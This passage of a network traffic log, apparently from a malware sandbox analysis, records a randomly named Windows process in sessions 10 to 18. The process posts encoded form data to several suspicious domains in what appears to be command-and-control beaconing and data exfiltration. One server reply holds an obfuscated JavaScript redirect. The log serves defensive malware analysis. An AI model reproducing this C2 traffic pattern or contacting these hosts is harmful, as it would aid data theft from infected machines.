Dec 9, 2024 08:33:00.766001940 CET	1818	OUT	POST /9ffw/ HTTP/1.1 Host: www.d48dk.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Origin: http://www.d48dk.top Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 1253 Referer: http://www.d48dk.top/9ffw/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Data Raw: 36 50 76 68 38 54 58 50 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 6f 73 30 70 4e 75 4f 41 4c 5a 59 71 54 6b 49 32 32 46 42 33 4e 34 6e 78 59 75 38 49 68 37 61 73 2b 52 4a 36 45 52 4f 51 71 61 36 4e 6f 50 4d 72 4c 71 67 72 31 56 2b 51 55 70 76 49 45 41 76 31 6d 30 38 53 38 56 6d 52 6d 6d 57 35 4a 47 65 65 77 6e 37 36 74 33 78 61 68 6d 45 63 52 32 32 4f 6a 33 63 46 79 65 4e 6d 56 51 2b 30 75 32 50 38 47 38 48 6a 43 6a 7a 78 79 4e 67 58 44 71 56 50 4a 4a 6f 63 74 44 45 6d 41 56 51 71 6e 76 4d 33 50 6a 49 51 65 53 59 33 73 47 68 43 4d 42 39 6d 56 51 41 6b 4c 31 66 74 43 5a 69 55 30 36 6c 4a 36 79 76 4b 72 31 4b 6e 53 4c 4a 39 37 64 6d 67 71 49 41 46 4d 51 66 70 52 4d 74 69 48 6f 58 62 63 54 64 74 58 55 2b 35 2b 51 37 4a 41 65 33 71 78 32 74 56 4c 66 32 6c 33 45 50 35 63 62 75 6f 5a 39 67 36 68 59 59 67 65 4f 58 6c 70 61 59 6c 30 7a 57 65 63 6a 35 50 32 31 51 4c 65 45 6a 42 6f 71 69 57 71 74 6e 46 4b 64 78 63 42 36 65 74 6a 79 38 2b 6b 70 36 39 38 46 74 38 73 4b 43 6f 76 48 74 7a 43 57 6f 5a 33 49 36 49 [TRUNCATED] Data Ascii: 6Pvh8TXP=gCyAac3FM9KhZos0pNuOALZYqTkI22FB3N4nxYu8Ih7as+RJ6EROQqa6NoPMrLqgr1V+QUpvIEAv1m08S8VmRmmW5JGeewn76t3xahmEcR22Oj3cFyeNmVQ+0u2P8G8HjCjzxyNgXDqVPJJoctDEmAVQqnvM3PjIQeSY3sGhCMB9mVQAkL1ftCZiU06lJ6yvKr1KnSLJ97dmgqIAFMQfpRMtiHoXbcTdtXU+5+Q7JAe3qx2tVLf2l3EP5cbuoZ9g6hYYgeOXlpaYl0zWecj5P21QLeEjBoqiWqtnFKdxcB6etjy8+kp698Ft8sKCovHtzCWoZ3I6ImyeDRfe5TFBxLXjcsr0Z1sRC8jUv83kJa4kkYaBEeiwJiX6bMAMQFezHlebwvjZ/9p1fMEmkisOMGP5JLAgEPAA62QGUC7oLx7XiJs1bhsuhYvRNAeu3VUp2Ctpu/w1mIi4QctgFpUeKzS+/Lt1fboqWh/rL94m5xcCtcuT7EaLAfl+PtZkbQuDJiBFrudLHEPCEvNXgB2lhhFg3ve75/U1UUVGvuC85n97Z96u92xn2pFM0QFK2gZcsMk256x8tM8fUEDK2qiINUI0A6+x8K631woVtGsZdUTMznAPO6xfPYlthGpH9OAwNX4zSgx2u5ryc68YUBdEQ+OGglDIx/lvkxlNrxPYb3RGwajj869XkLFuoBXR5gZlAS398QuXzR1ZumaV+7cPZVo3EYPcC3iykr20MOO8AaOB74xdF7nFM11vDZOZ4P3z3clHIlpUSpQSKhjEE1Z/sL4F3hyArQTc+kphlOuVKQ7PPzeK1kUHVxsJqnOFIlASJwdYpYmaie5GeEYevNvoxeUE5su1fwgfMfPVmcj8hkz2z8uQdq/4GTgnOg2PAKn5JtYIitgO487v/t7zvNm0glePEt9p8dh2Jvh/V58uzXhtZhkADZ/udt/rL8zpuDluzsNpW4HwXI6Uv3CblEGvMNXmohX10sXx8t6XowUVYDl [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49753	154.23.184.207	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:33:03.422480106 CET	535	OUT	GET /9ffw/?6Pvh8TXP=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&9dfhu=10RxttPPB0 HTTP/1.1 Host: www.d48dk.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Dec 9, 2024 08:33:04.952549934 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 09 Dec 2024 07:33:04 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66927002-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49774	38.165.29.234	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:33:10.879636049 CET	803	OUT	POST /d3gs/ HTTP/1.1 Host: www.8312zcksnu.bond Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Origin: http://www.8312zcksnu.bond Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 221 Referer: http://www.8312zcksnu.bond/d3gs/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Data Raw: 36 50 76 68 38 54 58 50 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 67 53 65 74 6e 4c 61 67 4f 78 5a 70 2f 32 6b 66 6d 59 49 37 52 6f 6d 74 43 38 4f 32 63 72 45 78 50 67 72 58 58 71 47 32 72 74 37 6e 39 68 5a 6f 47 74 76 50 72 64 44 62 56 38 7a 35 41 4d 58 69 6f 36 50 64 34 61 49 66 45 34 46 4c 61 53 56 4f 70 33 6f 68 47 31 4f 47 77 47 41 57 6d 42 45 55 46 4a 32 57 75 6b 6f 57 6c 32 33 63 6f 76 6e 72 44 35 6c 65 52 39 71 4e 45 4e 38 64 48 37 2f 73 6f 68 5a 33 78 62 74 39 51 2b 39 6a 37 62 4c 75 37 49 42 6c 65 55 53 56 71 77 72 65 39 41 4b 33 53 78 43 6b 53 53 6a 53 2b 59 64 32 77 45 65 32 34 55 43 5a 65 35 4f 73 34 48 79 73 50 57 2b 74 63 69 4a 77 65 67 3d 3d Data Ascii: 6Pvh8TXP=pni45pvYJcfAgSetnLagOxZp/2kfmYI7RomtC8O2crExPgrXXqG2rt7n9hZoGtvPrdDbV8z5AMXio6Pd4aIfE4FLaSVOp3ohG1OGwGAWmBEUFJ2WukoWl23covnrD5leR9qNEN8dH7/sohZ3xbt9Q+9j7bLu7IBleUSVqwre9AK3SxCkSSjS+Yd2wEe24UCZe5Os4HysPW+tciJweg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49781	38.165.29.234	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:33:13.576628923 CET	823	OUT	POST /d3gs/ HTTP/1.1 Host: www.8312zcksnu.bond Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Origin: http://www.8312zcksnu.bond Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 241 Referer: http://www.8312zcksnu.bond/d3gs/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Data Raw: 36 50 76 68 38 54 58 50 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 6a 79 75 74 6c 73 75 67 47 78 5a 6d 6d 47 6b 66 76 34 49 2f 52 6f 61 74 43 39 36 6d 63 59 67 78 4f 41 62 58 57 76 6d 32 73 74 37 6e 7a 42 5a 70 43 74 76 51 72 64 50 70 56 2b 6e 35 41 4d 72 69 6f 34 58 64 34 70 51 63 57 59 46 4a 53 79 56 51 6a 58 6f 68 47 31 4f 47 77 47 55 76 6d 48 73 55 46 36 75 57 30 47 4d 4a 2b 57 33 66 76 76 6e 72 48 35 6c 61 52 39 72 59 45 50 49 33 48 35 48 73 6f 6c 64 33 78 71 74 2b 66 2b 39 6c 6c 72 4c 39 38 35 6b 54 58 6b 4f 32 31 6d 6a 41 33 33 43 79 65 6e 44 47 49 77 76 2b 67 4a 6c 4e 30 47 36 41 76 79 66 73 63 34 4b 30 31 6c 47 4e 51 68 62 48 52 77 6f 30 49 66 56 4f 61 41 6f 6d 6b 67 51 65 79 42 6e 70 5a 64 69 6f 52 5a 38 3d Data Ascii: 6Pvh8TXP=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYgxOAbXWvm2st7nzBZpCtvQrdPpV+n5AMrio4Xd4pQcWYFJSyVQjXohG1OGwGUvmHsUF6uW0GMJ+W3fvvnrH5laR9rYEPI3H5Hsold3xqt+f+9llrL985kTXkO21mjA33CyenDGIwv+gJlN0G6Avyfsc4K01lGNQhbHRwo0IfVOaAomkgQeyBnpZdioRZ8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49787	38.165.29.234	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:33:16.262901068 CET	1836	OUT	POST /d3gs/ HTTP/1.1 Host: www.8312zcksnu.bond Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Origin: http://www.8312zcksnu.bond Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 1253 Referer: http://www.8312zcksnu.bond/d3gs/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Data Raw: 36 50 76 68 38 54 58 50 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 6a 79 75 74 6c 73 75 67 47 78 5a 6d 6d 47 6b 66 76 34 49 2f 52 6f 61 74 43 39 36 6d 63 59 6f 78 50 79 54 58 57 4a 75 32 74 74 37 6e 73 78 5a 6b 43 74 76 64 72 64 6e 74 56 2b 72 70 41 4a 76 69 70 62 66 64 76 4d 6b 63 64 59 46 4a 65 53 56 52 70 33 6f 34 47 31 65 43 77 47 45 76 6d 48 73 55 46 39 57 57 36 45 6f 4a 38 57 33 63 6f 76 6e 6e 44 35 6c 32 52 39 6a 49 45 50 4d 4e 48 6f 6e 73 72 46 4e 33 32 49 46 2b 53 2b 39 6e 6b 72 4b 67 38 35 59 41 58 6b 43 36 31 6d 2f 2b 33 77 47 79 62 57 61 4d 53 53 66 70 39 35 45 58 33 46 69 54 70 52 7a 47 46 4a 61 6a 32 32 65 57 53 54 44 47 4a 32 41 62 4c 36 4d 7a 4c 7a 30 46 6f 43 63 32 31 6b 36 68 62 73 33 73 41 59 76 71 6d 58 42 79 42 44 76 34 64 4d 61 5a 56 54 42 36 37 6a 6a 39 79 58 4f 55 4f 6e 31 45 77 37 67 64 6b 54 61 33 48 37 54 2f 6d 48 66 74 2b 6b 75 59 34 51 70 2f 34 69 59 31 69 4e 4c 69 47 42 46 65 6a 36 56 33 34 6e 48 2b 6c 62 67 6f 56 41 6d 4b 4e 6d 54 4d 46 39 68 69 6f 61 65 45 36 6c 79 6a 79 [TRUNCATED] Data Ascii: 6Pvh8TXP=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYoxPyTXWJu2tt7nsxZkCtvdrdntV+rpAJvipbfdvMkcdYFJeSVRp3o4G1eCwGEvmHsUF9WW6EoJ8W3covnnD5l2R9jIEPMNHonsrFN32IF+S+9nkrKg85YAXkC61m/+3wGybWaMSSfp95EX3FiTpRzGFJaj22eWSTDGJ2AbL6MzLz0FoCc21k6hbs3sAYvqmXByBDv4dMaZVTB67jj9yXOUOn1Ew7gdkTa3H7T/mHft+kuY4Qp/4iY1iNLiGBFej6V34nH+lbgoVAmKNmTMF9hioaeE6lyjyJN6VWOdTWnlFOpEYWt+L/b9PeQKW45ib64oeSx9AhP+nNQkUf5rHAJz2iRK+raVsszc7xmAvpdTfRrwuEDKHPYJ+Gv1O/mxqIR+q6xqeFgU7oo7zUcIR73oGE4Y2wkAQEt22OgaW0g0qiMlyhsriPzQuY3tjX/8FMJKxshiNeyobbvHyP/zdNRfSsLF5uWNPdopyOuV2c2vZFXaWIKoX7BghSdQzZyfAHv4sO00OB6ttMF60q0o5zUq5pR6icQYwZNxWpMl06R1qy04AJBfl6Jz0b0MCYWPxhFR/bIlV40Kz7jhhldjygDTEPgUPd59vBnln5V5/b8E9cZ0uSBE4Yjt2qLbCai2oyXa2K5mvVSkkqHKA9OxnF/O3JpUMMCtDD7sXGx/w2KdWjd9Q9erBh3csMDKIOi/eRGBep7yUEaOxjGPIMPZcQ2pRbS7ig2JqO+lrHlD+Q3grFr2llkkn1AChKCMV64CLsyUWJlIQDxDmT4hJUXJqMS6iX8lMCvcVT5CGm7ptH+eEIt1ozbNplD1vnpcM5mNq3ThVx/GUWuASMwCOmqrux+7OkFtRWbuXhrgctO9pwyuMSKtbNGzO3EQzqtyBqQ1DIZjaL++W8MqMJdF79dhPHNrVwNKJD9TIZSmcXBEt1ZyRJTKPGamPM+SAQoS9NfXzmT [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49793	38.165.29.234	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:33:19.121292114 CET	541	OUT	GET /d3gs/?6Pvh8TXP=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&9dfhu=10RxttPPB0 HTTP/1.1 Host: www.8312zcksnu.bond Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Dec 9, 2024 08:33:21.000924110 CET	858	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Dec 2024 07:33:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 32 39 39 0d 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 37 34 61 39 61 63 65 62 37 63 61 63 32 35 64 61 66 61 37 61 30 62 31 35 63 64 38 62 35 63 39 64 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 31 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 [TRUNCATED] Data Ascii: 299<script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9d"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script> var url = "https://shksj.sdnasj.nduau.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; setTimeout(function() { window[_0x0[0]][_0x0[1]] = url; }, 0);</script>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49813	13.248.169.48	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:33:26.687251091 CET	785	OUT	POST /4nyz/ HTTP/1.1 Host: www.snyp.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Origin: http://www.snyp.shop Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 221 Referer: http://www.snyp.shop/4nyz/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Data Raw: 36 50 76 68 38 54 58 50 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 4e 52 6f 68 66 4b 6a 7a 77 59 44 47 6d 6c 46 78 72 7a 43 30 62 73 69 4b 31 4c 35 4d 72 4e 63 51 6a 53 67 54 51 4a 58 44 41 6f 79 51 34 35 67 2b 48 52 55 65 4b 36 38 6e 4d 79 4b 4a 49 65 4e 57 48 48 31 71 63 53 6c 59 66 6e 38 62 6c 50 33 4e 45 70 51 52 37 44 55 65 62 78 48 43 57 4a 48 76 61 49 35 32 39 2f 67 6c 41 2b 32 34 78 48 5a 44 70 4b 33 71 55 53 39 79 56 63 46 58 37 7a 42 4b 6f 2b 76 6f 32 58 44 6a 36 39 69 41 69 63 2f 6d 47 73 53 51 67 56 31 58 50 48 74 6e 62 48 5a 49 69 31 71 33 78 39 68 55 6a 38 73 34 35 67 6f 64 39 43 5a 64 36 6f 62 50 69 6b 58 69 66 33 70 4c 47 4d 54 78 31 67 3d 3d Data Ascii: 6Pvh8TXP=WekfKnjJCwpVNRohfKjzwYDGmlFxrzC0bsiK1L5MrNcQjSgTQJXDAoyQ45g+HRUeK68nMyKJIeNWHH1qcSlYfn8blP3NEpQR7DUebxHCWJHvaI529/glA+24xHZDpK3qUS9yVcFX7zBKo+vo2XDj69iAic/mGsSQgV1XPHtnbHZIi1q3x9hUj8s45god9CZd6obPikXif3pLGMTx1g==
Dec 9, 2024 08:33:27.761787891 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49820	13.248.169.48	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:33:29.432353020 CET	805	OUT	POST /4nyz/ HTTP/1.1 Host: www.snyp.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Origin: http://www.snyp.shop Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 241 Referer: http://www.snyp.shop/4nyz/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Data Raw: 36 50 76 68 38 54 58 50 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 66 69 77 68 64 74 33 7a 6e 6f 44 4a 70 46 46 78 6c 54 43 77 62 73 75 4b 31 50 68 63 72 2f 34 51 6a 77 6f 54 52 4e 4c 44 44 6f 79 51 77 5a 67 33 59 68 55 4a 4b 36 78 51 4d 7a 47 4a 49 59 68 57 48 43 52 71 63 6c 78 62 66 33 38 64 74 76 33 4c 41 70 51 52 37 44 55 65 62 78 69 58 57 4a 66 76 5a 34 4a 32 38 65 67 6d 62 65 32 37 32 48 5a 44 6a 71 33 32 55 53 39 41 56 5a 35 78 37 78 4a 4b 6f 2b 66 6f 32 46 72 38 30 39 69 4f 2f 4d 2b 66 4a 4d 58 67 6e 30 4a 76 4f 6b 52 79 53 56 52 69 6a 44 72 56 72 66 74 34 39 74 55 44 39 69 4d 72 71 6b 45 6f 34 70 66 58 76 47 6a 44 41 41 4d 68 4c 65 79 31 6a 63 44 68 4c 36 42 48 42 30 4f 31 2f 77 5a 4b 50 4c 79 4a 34 61 77 3d Data Ascii: 6Pvh8TXP=WekfKnjJCwpVfiwhdt3znoDJpFFxlTCwbsuK1Phcr/4QjwoTRNLDDoyQwZg3YhUJK6xQMzGJIYhWHCRqclxbf38dtv3LApQR7DUebxiXWJfvZ4J28egmbe272HZDjq32US9AVZ5x7xJKo+fo2Fr809iO/M+fJMXgn0JvOkRySVRijDrVrft49tUD9iMrqkEo4pfXvGjDAAMhLey1jcDhL6BHB0O1/wZKPLyJ4aw=
Dec 9, 2024 08:33:30.438803911 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49826	13.248.169.48	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:33:32.217272043 CET	1818	OUT	POST /4nyz/ HTTP/1.1 Host: www.snyp.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Origin: http://www.snyp.shop Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 1253 Referer: http://www.snyp.shop/4nyz/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Data Raw: 36 50 76 68 38 54 58 50 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 66 69 77 68 64 74 33 7a 6e 6f 44 4a 70 46 46 78 6c 54 43 77 62 73 75 4b 31 50 68 63 72 2f 77 51 6a 46 38 54 52 71 2f 44 43 6f 79 51 78 5a 67 79 59 68 55 49 4b 36 70 55 4d 7a 62 72 49 64 39 57 42 55 64 71 65 58 4a 62 47 48 38 64 68 50 33 4f 45 70 52 46 37 44 45 53 62 78 79 58 57 4a 66 76 5a 2b 4e 32 31 76 67 6d 5a 65 32 34 78 48 5a 66 70 4b 33 53 55 53 6c 36 56 59 4e 48 36 41 70 4b 6f 61 37 6f 37 57 44 38 72 74 69 4d 38 4d 2b 75 4a 4e 72 2f 6e 30 46 46 4f 6c 31 59 53 56 5a 69 75 33 32 57 32 2b 4e 66 2b 4e 31 57 7a 78 55 4a 39 33 78 63 68 49 72 6a 71 6c 44 74 46 53 55 44 47 49 44 35 68 5a 4f 45 4b 35 67 31 48 6b 33 6d 34 6e 34 45 65 4a 62 44 6b 4d 78 69 30 6d 41 30 30 32 39 77 39 46 6f 2b 74 37 77 78 35 43 55 48 4b 55 33 39 7a 70 6c 69 31 6c 57 57 30 74 2f 56 46 64 5a 4a 4f 34 6a 35 42 48 4b 4f 74 45 36 4f 51 50 2f 47 54 56 44 73 75 56 53 62 71 6f 43 33 64 6c 78 50 69 63 53 33 54 62 5a 65 6a 69 55 38 61 67 6d 41 65 2f 62 48 4f 64 4c 63 78 [TRUNCATED] Data Ascii: 6Pvh8TXP=WekfKnjJCwpVfiwhdt3znoDJpFFxlTCwbsuK1Phcr/wQjF8TRq/DCoyQxZgyYhUIK6pUMzbrId9WBUdqeXJbGH8dhP3OEpRF7DESbxyXWJfvZ+N21vgmZe24xHZfpK3SUSl6VYNH6ApKoa7o7WD8rtiM8M+uJNr/n0FFOl1YSVZiu32W2+Nf+N1WzxUJ93xchIrjqlDtFSUDGID5hZOEK5g1Hk3m4n4EeJbDkMxi0mA0029w9Fo+t7wx5CUHKU39zpli1lWW0t/VFdZJO4j5BHKOtE6OQP/GTVDsuVSbqoC3dlxPicS3TbZejiU8agmAe/bHOdLcxLaYVCe+t2+8WmTTWxkOLxC83/rm2nRrtlZ1R9j+uNpsVxU5alnFq82dJjBA0fz/yIxv1nd9MjDTQUa4xlSB4Azkf/40Cu+RYuIgLdIcngwNaOw6drWkg46g2TeuSBlMCQMUE9/Gl5BTANgUAm9Gagr5nBWzfEm2yAYIshqVoAfmrplGe/ZzPbrOD3vv0YKZdV9tE8J8UnCFj8jhuofazMutg2L5WoIGxwDq5loS/Nln+zcxHuoNHgUaDehbviPHQil0Xoml0A7V+zaUZ5Lkrhbpc+p/8KC1244di+MMZuMil8HWxRjL+2JVnrbMfczoimDZhSxl2vOgHJrl50JcUW0Ro2al7vhW9B24jwMZg31UyTzl44NZTom9hgmRTV9T3dazR1ZYHtYQjPtDhVZuBW8U4xVD7AmoUBcGlUu6jge31+X6R5VUIfcrZANc9BborUBTWvp3p0Xi/GV2GA6Zi3Yb6z+FgNnLg+reQI7UJEwf7edVr6py/g6XMuSKZVEBgv7bNOkMhAP5pMwijpTvnJybO/dCgS76cUgQXKYEhlF/TAp54ujgizgMHiKkEZibQvow2s1Z/U0c48q4eBJqJ9LC1fY+3hNDMdQ/4v9mxPOw2vYPjlNTjR27kJ4Mj9Iwwo833Yx2XW4N4pdjbe3sHz3YFuiUbDn6ZoQ [TRUNCATED]
Dec 9, 2024 08:33:33.186393976 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49833	13.248.169.48	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
